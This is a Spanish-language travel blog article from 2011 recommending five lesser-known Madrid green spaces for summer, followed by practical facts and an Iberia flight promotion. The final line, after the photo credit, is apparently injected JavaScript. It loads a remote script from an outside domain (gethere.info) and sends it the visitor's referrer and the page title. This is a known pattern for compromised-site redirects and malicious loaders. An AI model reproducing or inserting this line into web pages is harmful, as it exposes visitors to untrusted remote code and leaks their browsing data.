Madrid, verano a la sombra

14/07/2011

¿Madrid en verano? Uf, pensará más de uno. Que no cunda el pánico. La capital española registra altas temperaturas, sí, pero es la segunda ciudad del mundo con más árboles en sus calles. Eso sin contar la cantidad de parques y jardines que esconde. Los hay de todos los tipos: históricos y modernos. Si ya ha visitado el Retiro, ponga rumbo a estas joyas verdes menos conocidas.

  • Jardín del Príncipe de Anglona. Es el secreto mejor guardado del barrio de La Latina. En una esquina de la Plaza de la Paja aparece este jardincito dieciochesco que formó parte del palacio contiguo. Hoy está abierto al público y desde él se observan las cúpulas y tejados del Madrid de los Austrias. Un regalo para la vista y un lugar para leer, escuchar música en paz o simplemente quedarse en Babia. Mucho silencio.
  • Parque del Capricho. Es poco conocido incluso entre los madrileños, pero este parque es uno de los espacios histórico-artísticos más importantes de la ciudad. Ubicado en el distrito de Barajas, data del siglo XVIII. Los Duques de Osuna lo construyeron para alejarse del ruido de la ciudad. Y, como su nombre indica, es un capricho excéntrico: bustos de emperadores romanos, laberintos de setos, pequeñas atracciones que reproducen las costumbres populares, una ría y un casino de baile. Después de verlo, le encantaría haber vivido en la época de las pelucas blancas.
  • Parque Juan Carlos I. A un paso del centro de negocios de Campo de las Naciones, se halla este remanso de tranquilidad. Es un enorme parque de estilo moderno con cuestas verdes, praderas llanas, ríos, láminas de agua y enormes esculturas vanguardistas. Desde aquí se divisan unas vistas impresionantes de la ciudad. Incluye un servicio gratuito de bicis para recorrer de manera más cómoda todo el espacio. Imprescindible.
  • Campo del Moro. Los turistas visitan el Palacio Real y luego se dan una vuelta por los Jardines de Sabatini. No sospechan que bajando la Cuesta de San Vicente se encuentra una de las mejores postales de Madrid: las traseras del palacio y una enorme pradera verde que sube. Le gustarán la fuente de los tritones y de las conchas y la cantidad de árboles centenarios de 70 especies diferentes. Si ve patos, cisnes y pavos reales corriendo, no se asuste. Andan con total libertad por este bosque.
  • Río Manzanares. Es el espacio verde de moda entre los madrileños, pero aún es desconocido para la inmensa mayoría de visitantes. El río estuvo durante décadas lleno de humos y enclaustrado por la infernal M-30. Hoy ha resurgido con un paseo verde de seis kilómetros, con los puentes históricos rehabilitados y otros vanguardistas, como el enorme tirabuzón de Perrault o las pasarelas gemelas decoradas con imágenes de madrileños. Hay carriles bicis, juegos infantiles modernos, miradores, pistas deportivas y de skate… Aproveche para visitar Matadero Madrid, un gran centro que ofrece cultura contemporánea donde antes se despellejaban cerdos.

Datos útiles:

  • Madrid tiene 3.256.000 habitantes y cinco con su área metropolitana.
  • El medio de transporte más cómodo y rápido es el metro.
  • Las estaciones son muy extremas: los inviernos son muy fríos y los veranos, muy calurosos.
  • Las mejores ofertas para volar a Madrid, las encontrará en Iberia.com marcando en su búsqueda «soy flexible en fechas». Iberia conecta la capital con más de 500 vuelos diarios desde la T4 del aeropuerto de Madrid-Barajas.

Foto | jauspe

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;